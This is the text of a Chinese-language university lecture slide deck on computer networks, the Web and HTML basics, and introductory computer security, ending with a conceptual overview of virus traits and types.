Download presentation
Presentation is loading. Please wait.
1
大学计算机-计算思维导论 哈尔滨工业大学
2
教学内容 Chapter 1. 引论 Chapter 2. 计算系统的基本思维 Chapter 3. 问题求解框架
3
教学内容 Chapter 1. 引论 Chapter 2. 计算系统的基本思维 Chapter 3. 问题求解框架
4
下页 第6章 计算机网络、信息网络与网络化社会 要点: 计算机网络:机器之间的互联; 文档网络:信息之间的互联; 网络安全知识 End
5
下页 6.1 网络与社会 End
6
下页 6.1 网络与社会 计算机网络,实现了计算机与计算机之间的物理连接,实现了网络与网络之间的物理连接,最终形成了世界最大规模计算机器的互联网络---国际互联网(Internet)。 End
7
6.1 网络与社会 在介绍计算机网络的技术细节前,先介绍近些年出现的与计算机网络有关的两个新概念: 物联网技术 Web 2.0技术
8
6.1 网络与社会 什么是物联网? 物联网是新一代信息技术的重要组成部分。其英文名称是“The Internet of things”。,顾名思义,“物联网就是物物相连的互联网”。 这有两层意思:第一,物联网的核心和基础仍然是互联网,是在互联网基础上的延伸和扩展的网络;第二,其用户端延伸和扩展到了任何物品与物品之间,进行信息交换和通信。 因此,物联网的定义是通过射频识别、红外感应器、全球定位系统、激光扫描器等信息传感设备,把任何物品与互联网相连接,进行信息交换和通信,以实现对物品的智能化识别、定位、跟踪、监控和管理的一种网络。 条码扫描器,又称为条码阅读器、条码扫描枪、条形码扫描器、条形码扫描枪及条形码阅读器。它是用于读取条码所包含信息的阅读设备,利用光学原理,把条形码的内容解码后通过数据线或者无线的方式传输到电脑或者别的设备。广泛应用于超市、物流快递、图书馆等扫描商品、单据的条码。
9
6.1 网络与社会 常用信息传感技术之一:射频识别技术 射频识别即RFID(Radio Frequency IDentification)技术,又称无线射频识别,是一种通信技术,可通过无线电讯号识别特定目标并读写相关数据。 一套完整的RFID系统, 是由1)阅读器(Reader)与2)应答器(Transponder)也就是所谓的电子标签(TAG)及3) 应用软件系统三个部份所组成. 其工作原理是Reader发射一特定频率的无线电波能量给Transponder,用以驱动Transponder电路将内部的数据送出,此时Reader便依序接收解读数据, 送给应用程序做相应的处理。 与条形码不同的是,射频标签不需要处在识别器视线之内,也可以嵌入被追踪物体之内。而对于条码技术而言,它是将已编码的条形码附着于目标物并使用专用的扫描读写器利用光信号将信息由条形磁传送到扫描读写器。 目前RFID技术应用很广,如:图书馆,门禁系统,食品安全溯源等。 IC卡分为接触式和非接触式IC卡,都属于RFID范畴,接触式IC卡其芯片直接封装在卡基表面,而非接触式IC卡是由芯片和线圈组成,可分为COB绕铜线、蚀刻天线、印刷天线等等,两者的应用区别在于:前者在使用过程中需要插入读卡器使用,例如银行卡,后者仅需要靠近读卡器感应天线就能被读取,例如交通卡、门禁卡 RFID: 读写器发射能量--> 激活标签芯片--> 送出数据-->读写器接收数据 只有读写器有能量 标签靠读写器的射频激发能力 蓝牙和红外是: 发出请求-->接收请求--->传输数据 两端都有能量 RFID 有低频 高频 超高频 微波 4种类型 用得比较多得时 125K 13.56M 915M 2.45G 4个频段,分有源、无源 蓝牙 是2.45G。 红外 主要用来做传感器。通讯功能不强。如红外的条码扫描、电视遥控。
10
什么是Web2.0? 6.1 网络与社会 例如,现在如火如荼的微博、博客等。 Web2.0 是相对Web1.0 的新的一类互联网应用的统称。
6.1 网络与社会 什么是Web2.0? Web2.0 是相对Web1.0 的新的一类互联网应用的统称。 Web1.0 的主要特点在于用户通过浏览器获取信息。Web2.0 则更注重用户的交互作用,用户既是网站内容的浏览者,也是网站内容的制造者。 所谓网站内容的制造者是说互联网上的每一个用户不再仅仅是互联网的读者,同时也成为互联网的作者。 例如,现在如火如荼的微博、博客等。 Web 2.0信息挖掘的一个例子。谷歌公司发现,搜索流感相关主题的人数与实际患有流感症状的人数之间存在着密切的关系。当然,并非每个搜索“流感”的人都真的患有流感,但当将与流感有关的搜索查询汇总到一起时,便可以找到一种模式。他们将自己统计的查询数量与传统流感监测系统的数据进行了对比,结果发现许多搜索查询在流感季节确实会明显增多。通过对这些搜索查询的出现次数进行统计,便可以估测出世界上不同国家和地区的流感传播情况。其研究结果已发表在美国《自然》杂志上。
11
下页 6.1 网络与社会 Web 2.0的出现,使得在文档网络之上增加了群体性互动性,使互联网更加关注文档的创造者与阅读者之间的互动,更关注这种互动网络的群体性、社会性和内容性,这种网络又被称为社会网络(Social Network)。 End
12
下页 6.2 计算机网络 End
13
6.2.1 网络通信的基本原理 1. 信源、信宿和信道, 信号的编码、发送和接收 连续信号和离散信号的区别:
下页 网络通信的基本原理 1. 信源、信宿和信道, 信号的编码、发送和接收 网络通信的基本原理示意图 连续信号和离散信号的区别: 连续信号的幅值不断变化的,无限的,不能用具体的数表示,而离散信号的取值是有限的,能用有限具体的数值来表达。 离散信号是在连续信号上采样得到的信号。 End
14
网络通信的基本原理 WiFi: ”是由“wireless [‘waɪələs] (无线电)”和“fidelity[fi’deliti](保真度)”组成。 Wi-Fi上网可以简单的理解为无线上网,是当今使用最广的一种无线网络传输技术。 实际上就是把有线网络信号转换成无线信号。手机如果有Wi-Fi功能的话,在有Wi-Fi无线信号的时候就可以不通过移动联通的网络上网,省掉了流量费。但是Wi-Fi信号也是由有线网提供的,比如宽带信号等。只要接一个无线路由器,就可以把有线信号转换成Wi-Fi信号。 一般Wi-Fi信号接收半径约95米,但会受墙壁等影响,实际距离会小一些。 蓝牙: 是一种支持设备短距离通信(一般10m内)的无线电技术。能在包括移动电话、PDA、无线耳机、笔记本电脑、相关外设等众多设备之间进行无线信息交换。
15
6.2.1 网络通信的基本原理 网络的典型拓扑结构 下页 End
网络通信的基本原理 1、星型网络结构 在星型网络结构中各个计算机使用各自的线缆连接到网络中,因此如果一个站点出了问题,不会影响整个网络的运行。 星型结构每一个工作站都使用一根双绞线与集线器听一个接口相连,因此,这种结构有易于维护。采用交换电缆或工作站的简单方法可以很容易地确定网络故障点。另外,通道分离,整个网络不会因一个站点的故障而受到影响,网络节点的增删方便,快捷。星型网络结构是现在最常用的网络拓扑结构。 2、环型网络结构 环型网络结构的各站点通过通信介质连成一个封闭的环形。环形网络容易安装和监控,但容量有限,网络建成后,难以增加新的站点。环型结构中各接点通过信息线路组成闭合环路。环中数据沿一个方向传输。其特点是结构简单,容易实现,传输延迟确定。环中任何一个结点出现线路故障,都将造成网络瘫痪。因此,现在组建局域网已经基本上不使用环型网络结构了。 3、总线型网络结构 在总线型网络结构中所有的站点共享一条数据通道。总线型网络安装简单方便,需要铺设的电缆最短,成本低,某个站点的故障一般不会影响整个网络,但介质的故障会导致网络瘫痪。总线网安全性低,监控比较困难,增加新站点也不如星型网容易。总线型结构是最经济、最简单、有效的网络结构之一,具有频带较宽,数据传送不易受干扰的特点,但由于总线结构是由一根电缆连接着所有设备,一段线路断路将导致整个网络运行中断,而使其稳定性较差。所以,总线型网络结构现在基本上已经被淘汰了. 网络的典型拓扑结构 End
16
6.2.1 网络通信的基本原理 2 分组信息交换:化整为零传输(也称包交换)
下页 网络通信的基本原理 2 分组信息交换:化整为零传输(也称包交换) 从通信资源的分配角度来看,“交换”就是按照某种方式动态地分配传输线路的资源。 分组交换是与传统的电路交换相区别而言的。 电路交换与分组交换 从通信资源的分配角度来看,“交换”就是按照某种方式动态地分配传输线路的资源。 1.电路交换 在使用电路交换打电话之前,先拨号建立连接:当拨号的信令通过许多交换机到达被叫用户所连接的交换机时,该交换机就向用户的电话机振铃;在被叫用户摘机且摘机信号传送回到主叫用户所连接的交换机后,呼叫即完成,这时从主叫端到被叫端就建立了一条连接。通话过程。通话结束挂机后,挂机信令告诉这些交换机,使交换机释放刚才这条物理通路。这种必须经过“建立连接--通信--释放连接”三个步骤的连网方式称为面向连接的。电路交换必定是面向连接的。 用户到交换机之间的叫用户线,归电话用户专用。交换机之间、许多用户共享的叫中继线,拥有大量的话路,正在通话的用户只占用其中的一个话路,在通话的全部时间里,通话的两个用户始终占用端到端的固定传输带宽。 以电路联接为目的的交换方式是电路交换方式。电话网中就是采用电路交换方式。我们可以打一次电话来体验这种交换方式。打电话时,首先是摘下话机拨号。拨号完毕,交换机就知道了要和谁通话,并为双方建立连接,等一方挂机后,交换机就把双方的线路断开,为双方各自开始一次新的通话做好准备。因此,我们可以体会到,电路交换的动作,就是在通信时建立(即联接)电路,通信完毕时拆除(即断开)电路。至于在通信过程中双方传送信息的内容,与交换系统无关。 举例来说,我们假设有A、B两个城市,每个城市都有一部交换机并有一千个用户,两个交换机之间用100条中继线连接着。 那么,如果我们说:在A城的两个用户之间建立一条电路,我们指的是把两条用户线路通过A城的交换机联接起来。 但当我们说:在A城的一个用户和B城的一个用户之间建立一条电路时,我们指的就是由A城的用户线路经A城交换机联接到A、B城之间的一条中继线路,在经B城交换机联接到B城的用户线路上。由于经济上的原因,中继线路总是大大少于用户线路,并且为所有用户所共享。那么,当我们占用了一条中继线路以后,即使我们不传送信息,别人也不能使用,这就是电路交换最主要的缺点。 电路交换的机制有什么缺点? 从电路交换的工作原理看出,电路交换会占用固定带宽,因而限制了在线路上的流量以及连接数量 2.分组交换: 分组交换技术是在计算机技术发展到一定程度,人们除了打电话直接沟通,通过计算机和终端实现计算机与计算机之间的通信,在传输线路质量不高、网络技术手段还较单一的情况下,应运而生的一种交换技术。 分组交换也称包交换,它是将用户传送的数据划分成一定的长度,每个部分叫做一个分组。在每个分组的前面加上一个分组头,用以指明该分组发往何地址,然后由交换机根据每个分组的地址标志,将他们转发至目的地,这一过程称为分组交换。进行分组交换的通信网称为分组交换网。从交换技术的发展历史看,数据交换经历了电路交换、报文交换、分组交换和综合业务数字交换的发展过程。分组交换实质上是在“存储—转发”基础上发展起来的。它兼有电路交换和报文交换的优点。 原理: 分组交换在线路上采用动态复用技术传送按一定长度分割为许多小段的数据—分组。每个分组标识后,在一条物理线路上采用动态复用的技术,同时传送多个数据分组。把来自用户发端的数据暂存在交换机的存储器内,接着在网内转发。到达接收端,再去掉分组头将各数据字段按顺序重新装配成完整的报文。分组交换比电路交换的电路利用率高,比报文交换的传输时延小,交互性好。 分组交换的特点主要有: (1)线路利用率高:分组交换以虚电路的形式进行信道的多路复用,实现资源共享,可在一条物理线路上提供多条逻辑信道,极大地提高线路的利用率。使传输费用明显下降。 (2)不同种类的终端可以相互通信:分组网以X.25协议向用户提供标准接口,数据以分组为单位在网络内存储转发,使不同速率终端,不同协议的设备经网络提供的协议变换功能后实现互相通信。 (3)信息传输可靠性高:在网络中每个分组进行传输时,在节点交换机之间采用差错校验与重发的功能,因而在网中传送的误码率大大降低。而且在网内发生故障时,网络中的路由机制会使分组自动地选择一条新的路由避开故障点,不会造成通信中断。 (4)分组多路通信:由于每个分组都包含有控制信息,所以分组型终端可以同时与多个用户终端进行通信,可把同一信息发送到不同用户。 (5)计费与传输距离无关:网络计费按时长、信息量计费,与传输距离无关,特别适合那些非实时性,而通信量不大的用户。 分组交换的网络结构一般由分组交换机、网络管理中心、远程集中器、分组装拆设备、分组终端/非分组终端和传输线路等基本设备组成。分组交换机功能: 提供网络的基本业务:交换虚电路和永久虚电路及其他补充业务,如闭和用户群,网路用户识别等。在端到端计算机之间通信时,进行路由选择,以及流量控制。能提供多种通信规程,数据转发,维护运行,故障诊断,计费与一些网络的统计等。 用户进网方式有: 电话拨号入网:用户采用X.28规程或X.32规程,用一个调制解调器通过公用电话网(PSTN)连到分组交换网上。 专线入网:专线用户可租用市话模拟线或数字数据专线,采用X.28或X.25规程。方便地进入CHINAPAC。CHINAPAC向用户提供两种基本业务功能: 交换虚电路——指在两个用户之间建立的临时逻辑连接。 永久虚电路——指在两个用户之间建立的永久性的逻辑连接。用户一开机,一条永久虚电路就自动建立起来了。 3.分组交换与电路交换的比较 分组交换比电路交换的电路利用率高,比报文交换的传输时延小,交互性好。 分组交换和电路交换是两个节点或者主机之间传输数据的两种网络方式。对于分组交换网络来说,数据是通过分成单个的组进行传输的,通过电路把数据传送到另一台主机。在分组交换网络中,当数据包到达线路时,路由不是专门确定的。使用路由算法,每一个数据包实际上可以采用不同的路由通过网络到达目标主机。这与电路交换不同,电路交换设置一个静态路由,并且在开始连接主机之前就预先设置好了。 电路交换常于分组交换进行比较。其主要不同之处在于:分组交换的通信线路并不专用于源与目的地间的信息传输。在要求数据按先后顺序且以恒定速率快速传输的情况下,使用电路交换是较为理想的选择。因此,当传输实时数据时,诸如音频和视频;或当服务质量(QOS)要求较高时,通常使用电路交换网络。分组交换在数据传输方面具有更强的的效能,可以预防传输过程(如 信息和 Web 页面)中的延迟和抖动现象 End 信息分组传输示意图
17
下页 网络通信的基本原理 3. 协议及协议分层—复杂信息处理的化简方法 End
18
6.2.1 网络通信的基本原理 3. 协议及协议分层—复杂信息处理的化简方法
下页 网络通信的基本原理 3. 协议及协议分层—复杂信息处理的化简方法 协议(Protocol)。一般而言,协议是为交流信息的双方能够正确实现信息交流而建立的一组规则、标准或约定。 OSI(OPEN SYSTEM INTERCONNECTION)参考模型: 应用层 主要负责对软件提供接口以使程序能使用网络服务。 表示层 表示层管理数据的解密与加密,如系统口令的处理。例如:在Internet上查询你银行账户,使用的即是一种安全连接。你的账户数据在发送前被加密,在网络的另一端,表示层将对接收到的数据解密。除此之外,表示层协议还对图片和文件格式信息进行解码和编码。 会话层 负责在网络中的两节点之间建立、维持和终止通信。 会话层的功能包括:建立通信链接,保持会话过程通信链接的畅通,同步两个节点之间的对话,决定通信是否被中断以及通信中断时决定从何处重新发送。 常常听到有人把会话层称作网络通信的“交通警察”。当通过拨号向你的ISP(因特网服务提供商)请求连接到因特网时,ISP 服务器上的会话层向你与你的 PC 客户机上的会话层进行协商连接。若你的电话线偶然从墙上插孔脱落时,你终端机上的会话层将检测到连接中断并重新发起连接。会话层通过决定节点通信的优先级和通信时间的长短来设置通信期限 传输层 传输协议同时进行流量控制或是基于接收方可接收数据的快慢程度规定适当的发送速率。除此之外,传输层按照网络能处理的最大尺寸将较长的数据包进行强制分割。例如,以太网无法接收大于1500字节(Byte)的数据包。发送方节点的传输层将数据分割成较小的数据片,同时对每一数据片安排一序列号,以便数据到达接收方节点的传输层时,能以正确的顺序重组。该过程即被称为排序。 工作在传输层的一种服务是TCP/IP协议套中的TCP(传输控制协议)。 网络层 其主要功能是将网络地址翻译成对应的物理地址,并决定如何将数据从发送方路由到接收方。 网络层通过综合考虑发送优先权、网络拥塞程度、服务质量以及可选路由的花费来决定从一个网络中节点A 到另一个网络中节点B 的最佳路径。 网络层是可选的,它只用于当两个计算机系统处于不同的由路由器分割开的网段这种情况,或者当通信应用要求某种网络层或传输层提供的服务、特性或者能力时。例如,当两台主机处于同一个LAN网段的直接相连这种情况,它们之间的通信只使用LAN的通信机制就可以了(即OSI 参考模型的一二层)。 数据链路层 它的主要功能是如何在不可靠的物理线路上进行数据的可靠传递。为了保证传输,从网络层接收到的数据被分割成特定的可被物理层传输的帧。帧是用来移动数据的结构包,它不仅包括原始数据,还包括发送方和接收方的物理地址以及检错和控制信息。其中的地址确定了帧将发送到何处,而纠错和控制信息则确保帧无差错到达。 如果在传送数据时,接收点检测到所传数据中有差错,就要通知发送方重发这一帧。 物理层 物理层的任务就是为它的上一层提供一个物理连接,以及它们的机械、电气、功能和规程特性。如规定使用电缆和接头的类型、传送信号的电压等。在这一层,数据还没有被组织,仅作为原始的位流或电气电压处理,单位是bit比特。 End
19
下页 6.2.2 计算机网络连接--不同类别的机器网络 计算机网络按照规模大小和延伸范围可分为局域网(LAN:Local Area Network)、广域网(WAN:Wide Area Network)、互联网(internet)和因特网(Internet国际互联网)。 局域网 局域网是指在一个有限地理范围内的各种计算机及外部设备通过传输媒介连接起来的通信网络,可以包含一个或多个子网,通常局限在几千米的范围之内。 按照网络的拓扑结构,局域网通常可划分为以太网(Ethernet)、令牌环网(Token Ring)、令牌总线网(Token Bus)等,其中最常用的是以太网。 以小写字母i开始的internet(互联网或互连网)是一个通用名词,它泛指多个计算机网络互连而组成的网络,在这些网络之间的通信协议(即通信规则)可以是任意的。 以大写字母I开始的Internet(因特网)则是一个专用名词,它指当前世界上最大的、开放的、由众多网络相互连接而成的特定计算机网络,它采用TCP/IP协议族作为通信的规则,且前身是美国的ARPANET。 End
20
下页 6.2.2 计算机网络连接--不同类别的机器网络 局域网连接示意图
21
6.2.2 计算机网络连接--不同类别的机器网络 网络接口卡:从本质上看网卡就是一种编码器-解码器,既具有编码信息并发送信息的功能,又具有接收信息并解码信息的功能。 多台计算机在进行连网时,可采用连接器和集线器将电缆与网卡连接起来。 连接器:其实就是一个三通,它可在一条线路上形成分支,以连接多个计算机。 集线器:当集线器的端口收到某一台计算机发出的数据时,就转送到所有其它各端口,然后发送给各个计算机。随着发展,集线器功能也有增加,并具有处理数据、监视数据传输、过滤数据、提供故障排除信息等能力。
22
6.2.2 计算机网络连接--不同类别的机器网络 在一个组织内,更多情况是建立基于服务器的局域网络。
下页 6.2.2 计算机网络连接--不同类别的机器网络 在一个组织内,更多情况是建立基于服务器的局域网络。 在基于服务器的局域网络中,将计算机分为服务器和客户端两种类型。服务器是集中管理网络共享资源(硬、软件及信息)、提供网络通信及各种网络服务的计算机系统。 服务器可按功能进行设置,如设置文件服务器、邮件服务器、打印服务器等。 服务器则一般是不关机的,集中管理共享资源,可随时为网络上的用户进行服务。 客户机是网络上的个人计算机,客户机之间交流信息要通过网络的服务器来进行。
23
6.2.2 计算机网络连接--不同类别的机器网络 2. 广域网
下页 6.2.2 计算机网络连接--不同类别的机器网络 2. 广域网 广域网(WAN)是指由相距较远的计算机通过公共通信线路互联而成的网络,范围可覆盖整个城市、国家,甚至整个世界,广域网有时也称为远程网,通常除了计算机设备以外,还要使用电信部门提供的传输装置和媒介进行连接。 在图6.6(a)中,调制解调器一端需要与电话线路连接,另一端可以与计算机的串行口进行连接。利用调制解调器和电话线,只要通信双方能够拨打电话,就可以实现两台计算机的连接。而网络连接过程如拨打电话一样,首先(计算机自动)拨号,如果拨通则建立连接,然后便可进行信息传输,如果结束,则需要断开连接即挂断电话。网络连接后,就像你在打电话一样,占用着电话线路。同样,网络连接后,两台计算机之间的通信便如用电缆线连成的两台计算机之间通信一样,可以进行各种操作。 广域网连接示意图
24
6.2.2 计算机网络连接--不同类别的机器网络 调制与解调 调制(Modulation)是将数字信号变换成适合于模拟信道传输的模拟信号。
下页 6.2.2 计算机网络连接--不同类别的机器网络 调制与解调 调制(Modulation)是将数字信号变换成适合于模拟信道传输的模拟信号。 解调(Demodulation)是将从模拟信道上取得的模拟信号还原成数字信号。 也就是说,在计算机信息送到电话线路之前需要将数字信号调制成模拟信号,才能传输,而同样的,从电话线传来的模拟信号也需经过解调变成数字信号,计算机才能处理。实现这种功能的设备,被称作调制解调器(Modem)。
25
下页 6.2.2 计算机网络连接--不同类别的机器网络 3、互联网(internet) 多个网络的互连示意图
26
6.2.2 计算机网络连接--不同类别的机器网络 TCP/IP协议:其分为四层:应用层、传输层、网络互联层和网络接口层。
下页 6.2.2 计算机网络连接--不同类别的机器网络 TCP/IP协议:其分为四层:应用层、传输层、网络互联层和网络接口层。 应用层:包含了所有的高层协议,如文件传输协议FTP, 虚拟终端协议TELNET, 电子邮件协议SMTP,域名系统DNS、访问WWW站点的HTTP协议等。 传输层:可理解为TCP(Transmission Control Protocol)传输控制协议,规定了一种可靠的数据信息传递服务。 网络互联层:可理解为IP协议(Internet Protocol),其很重要的一点就是提供了IP地址(将在下面介绍)。 网络接口层:负责将IP协议层产生的分组进行封装,并在不同的网络上传输。
27
6.2.2 计算机网络连接--不同类别的机器网络 TCP/IP协议 简言之,
下页 6.2.2 计算机网络连接--不同类别的机器网络 TCP/IP协议 简言之, TCP协议负责发现传输的问题,一旦有问题就发信号要求重新传输,直到所有数据都安全正确的到达目的地。 而IP协议是负责给因特网上的每台电脑规定一个地址。
28
TCP/IP协议的三次握手 三次握手协议可以完成两个重要功能:1) 它确保连接双方做好传输准备,2)并使双方统一了初始顺序号。
每个报文段都包括了序列号字段和应答号字段,这使得两台机器仅仅使用三个握手报文就能协商好各自的数据流的顺序号。
29
数据是如何通过TCP/IP协议被封装的
30
下页 6.2.2 计算机网络连接--不同类别的机器网络 IP地址:就是给每一个连接在Internet网上的主机分配一个唯一的32位二进制位的地址。每个地址都由网络号和主机号组成,说明接入的是哪个网络的哪个主机。 人们在操作时一般书写成用“.”分隔的四个十进制数,例如:有如下的IP地址 ,记为 ,这显然方便得多。 每一个网络可分配的地址由该网络接入的上一级网络的信息中心提供。 而因特网IP地址的总分配由美国国防部数据网DDN的网络信息中心NIC来完成。 IP地址示例
31
6.2.2 计算机网络连接--不同类别的机器网络 网关和子网掩码 网关的用处:转发本网段机器通向其他网段机器的数据包。也称作路由器。
下页 6.2.2 计算机网络连接--不同类别的机器网络 网关和子网掩码 网关的用处:转发本网段机器通向其他网段机器的数据包。也称作路由器。 子网掩码的用处:便于网络设备尽快地区分本网段地址和非本网段的地址。 主机A与主机B交互信息 主机A: IP地址: 子网掩码: 网关地址: 主机B: IP地址: 子网掩码: 网关地址: 网关从端口 接收到主机A发往主机B的IP数据报文后, (1)首先用端口地址 与子网掩码地址 进行“逻辑与”,得到端口网段地址: , (2)然后将目的地址 与子网掩码地址 进行“逻辑与”,得 , (3)将结果 与端口网段地址 比较,如果相同,则认为是本网段的,不予转发。如果不相同,则将该IP报文转发到端口 所对应的网段。
32
6.2.2 计算机网络连接--不同类别的机器网络 Internet域名系统
下页 6.2.2 计算机网络连接--不同类别的机器网络 Internet域名系统 域名系统DNS(Domain Name System)用于将域名转换成计算机的IP地址。 域名系统是一个分布式主机信息数据库。整个数据库是一个倒立的树型结构,顶部是根。 例如哈工大的WWW服务器的域名就是 Internet国际特别委员会(IAAAC)负责域名的管理,解决域名注册的问题。中国的域名体系由中国网络信息中心(CNNIC)负责域名的管理和注册。 域名的结构及顶级域名示例
33
6.2.2 计算机网络连接--不同类别的机器网络 因特网基本服务 E-mail(电子邮件):是Internet的一种通信服务。
下页 6.2.2 计算机网络连接--不同类别的机器网络 因特网基本服务 (电子邮件):是Internet的一种通信服务。 FTP(File Transfer Protocol,文件传输协议)是Internet提供的存取远地计算机中文件的一种服务,它允许用户通过联网的本地计算机浏览、复制、存取网络上的某一台计算机中的文件。 Telnet(Telecommunication Network Protocol,远程通信网络协议)是Internet提供的进行远程登录访问的一种服务,使用Telnet可以从联网的本地计算机登入到网络上的某一台计算机,并操控使用该远程计算机的各种软件、硬件和信息资源等。 WWW是组织信息成为信息网络的重要方法。
34
下页 6.3 因特网与Web--信息网络
35
下页 6.3.1 由计算机网络走向文档/信息网络Web 计算机网络能够做什么? 最基本的就是“发布信息”“传播信息”“获取信息”。信息的载体是文档/文件,能否将不同计算机的文档之间也连接起来呢?此时,出现了超文本技术: 超文本不仅包含自身的信息文本,还要包含指向其他文档的链接。简单而言,超文本 = 文本 + 链接。 注意这里的文本是泛指,不仅指文字符号构成的文本,也泛指图像、声音等媒体性的文本。
36
下页 6.3.1 由计算机网络走向文档/信息网络Web 计算机网络之上的文档网络抽象示意图
37
下页 6.3.1 由计算机网络走向文档/信息网络Web 文档网络的语义链接示例
38
6.3.2 超文本/超媒体的表达与解析 1. 超文本/超媒体的基本概念
下页 6.3.2 超文本/超媒体的表达与解析 1. 超文本/超媒体的基本概念 超文本由若干个互连的文本块组成,这些文本块被称为节点(node)。节点不管大小,都有若干个指向其它节点或从其它节点指向该节点的指针,这些指针被称为链(link)、锚(anchor)或链锚。
39
6.3.2 超文本/超媒体的表达与解析 2. 超文本/超媒体的表达:HTML(超文本标注语言)
下页 6.3.2 超文本/超媒体的表达与解析 2. 超文本/超媒体的表达:HTML(超文本标注语言) 超文本/超媒体是用一种被称为HTML(HyperText Markup Language,超文本标记语言)的语言,在原有的文本/媒体(节点)信息基础上增加链锚信息来表达的。
40
6.3.2 超文本/超媒体的表达与解析 HTML文件中的标记一般有两种类型:
下页 6.3.2 超文本/超媒体的表达与解析 HTML文件中的标记一般有两种类型: 一种是成对出现的标记,被称为包装标记。如<BODY>…</BODY>,前者表示开始,而后者加了一个“/”,表示结束。它表示对标记范围内的文本或图像要展现或执行“标记”所表达的特性,即要进行包装,如格式处理、链接指针的显示或执行等; 还有一种是单一的标记,被称为空标记,如<HR>就是一个空标记,它的作用是划一条水平线;<BR/>也是一种空标记,表示要换行。 一般的HTML文件是一文本文件,即按ASCII码方式编码存储。
41
下页 6.3.2 超文本/超媒体的表达与解析 HTML文件以标记<HTML>表示文件开始,以标记</HTML>表示文件的结束。 它由文件头和文件主体组成。 文件头部分由标记<HEAD>…</HEAD>指示,一般,在文件头中放入的是该页的题目,由标记<TITLE>…</TITLE>指出。 文件主体部分由标记<BODY>…</BODY>指示。 标记<P>…</P>表示标记范围内的文本为一个节点段落,当你另起一段时,系统会在两段之间空行; 如何将图像文件合并到HTML文件中呢? 此时需要使用<IMG SRC>标记,其格式为:<IMG SRC=“图像所在的机器与路径/图像文件名”/>。例如,<IMG SRC="/imgDir/HuangHeLou.jpg"/>是将本机的/imgDir路径下的HuangHeLou.jpg文件合并到该文件的此标记所在位置。
42
6.3.2 超文本/超媒体的表达与解析 3. HTML对链接的表达
下页 6.3.2 超文本/超媒体的表达与解析 3. HTML对链接的表达 链锚标记A: 创建超文本和超媒体链接中的基本链是<A>标记或锚标记。有两类链接: (1). 绝对地址链接 下面是一个文本链接的基本格式:<A HREF=“URL”>屏幕显示内容</A> 如: <A HREF=“ 请注意HREF,它几乎与创建的每个链锚标记一起使用,它其实是A标记的一个属性。 (2). 本机内部文件相对地址链接 如果要链接的HTML文件在同一台计算机中,则需要的是相对的路径和文件名,如当HuangHeLou介绍.html与使用它的HTML文件在同一个目录中时,写成: <A HREF=“HuangHeLou介绍.html”>黄鹤楼</A>。
43
6.3.2 超文本/超媒体的表达与解析 (3). 文本内部段节链接
下页 6.3.2 超文本/超媒体的表达与解析 (3). 文本内部段节链接 这可以使读者不需要用PageUp或PageDown键翻动屏幕,就能直接定位到所需要阅读的内容。 如果要在同一个文件内建立段节的链接,则需要链锚源、链锚宿。二者需要成对使用。 链锚源标记的格式:例如示例中的 <A HREF=“#注解2”>悠悠</A>,将文件中的“悠悠”显示为一种指针。 (这里,“#”告诉系统在当前的文件中寻找一个段节,而不是到外面去寻找HTML文件) 链锚宿标记的格式:例如示例中的 <A NAME=“注解2”>2、悠悠:久远的意思。</A>。 (这里,NAME属性用来在当前的HTML文件中创建一个实际的段节,供链锚源参照)
44
下页 6.3.3 超文本/超媒体的组织与管理 网站与主页 一个网站(Web Site),是指建立在Web服务器上由特定人或小组建立或控制的网页的一个集合。 通常,网站可以从网站的索引页(index.htm)或缺省页(default.htm)开始,利用超文本链接将更多的网页链接在一起。这个首页被称为主页(home page)。 Web服务器是一台和Internet相连,执行传送Web页和其他相关文件(如与Web页相连的图像文件)的计算机。一般说来,该服务器计算机和Internet高速相连,能够处理来自Internet的多个同时连接请求。
45
6.3.2 超文本/超媒体的表达与解析 2. 统一资源定位地址URL
下页 6.3.2 超文本/超媒体的表达与解析 2. 统一资源定位地址URL 在Internet上,每种资源(包括网页和各种各样的文件、程序等)都可以使用统一的格式URL(Universal Resource Locator,统一资源定位器)来定位。URL的格式如下: Protocol://host.domain.first-level-domain/path/filename.ext (协议: //主机名.域名.第一层域名/路径/文件名.扩展名) 或者, Protocol://host.domain.first-level-domain (协议: //主机名.域名.第一层域名) 从URL的格式中我们可看出,其由三部分组成:1)协议、2)欲访问机器的IP地址或域名、3)在该机器下的目录及文件名。 例如, 或者 为哈尔滨工业大学的主页(home page)的URL。其中,http为使用的传输协议, 其URL为ftp://ftp.hit.edu.cn/。
46
下页 6.3.4 无限资源库的发掘和利用:搜索引擎 搜索引擎工作原理示意图
47
6.3.5互动网络与群体网络:互联网的创新更重要的是思维的创新
下页 6.3.5互动网络与群体网络:互联网的创新更重要的是思维的创新 借助网络力量,基于集体智慧利用的互联网创新(维基百科) 借助网络力量,聚集分散的资源,基于网络聚集资源利用的互联网创新(谷歌) 社交网络。(新浪微博) 其它,如阿里巴巴、当当网等。
48
下页 6.4 网络安全若干问题
49
计算机病毒和恶意软件 计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。
50
1. 计算机病毒特征 1.寄生性 2.传染性 3.潜伏性 4.隐蔽性 5.破坏性 6.可触发性
51
2. 计算机病毒分类 按照计算机病毒寄生方式进行分类,病毒可以划分为引导型病毒和文件病毒。
2. 计算机病毒分类 按照计算机病毒寄生方式进行分类,病毒可以划分为引导型病毒和文件病毒。 引导型病毒是一种在ROM BIOS之后,系统引导时出现的病毒。 利用操作系统的结构设计使得病毒可以在每次开机时,比系统文件先调入内存中,从而可以完全控制操作系统的各类中断,具有更强大的传染力和破坏力。 文件病毒感染计算机中的文件,如:COM、EXE、DOC等可执行程序为主。 它的安装必须借助于病毒的载体程序,即要运行病毒的载体程序,方能把文件型病毒引人内存。 已感染病毒的文件执行速度会减缓,甚至完全无法执行。 当使用来历不明文件的时候,先用最新升级过的杀毒软件进行检查,确认没有文件型病毒之后方可使用。切忌不要双击打开或复制。 微软操作系统都是使用一种称为链式装载的引导方法来启动的,主引导记录仅仅是简单地指向操作系统所在分区的第一个扇区。
52
三种典型病毒 分别是 1)木马病毒、2)蠕虫病毒、3)脚本病毒。 下面对这些病毒做展开介绍……
53
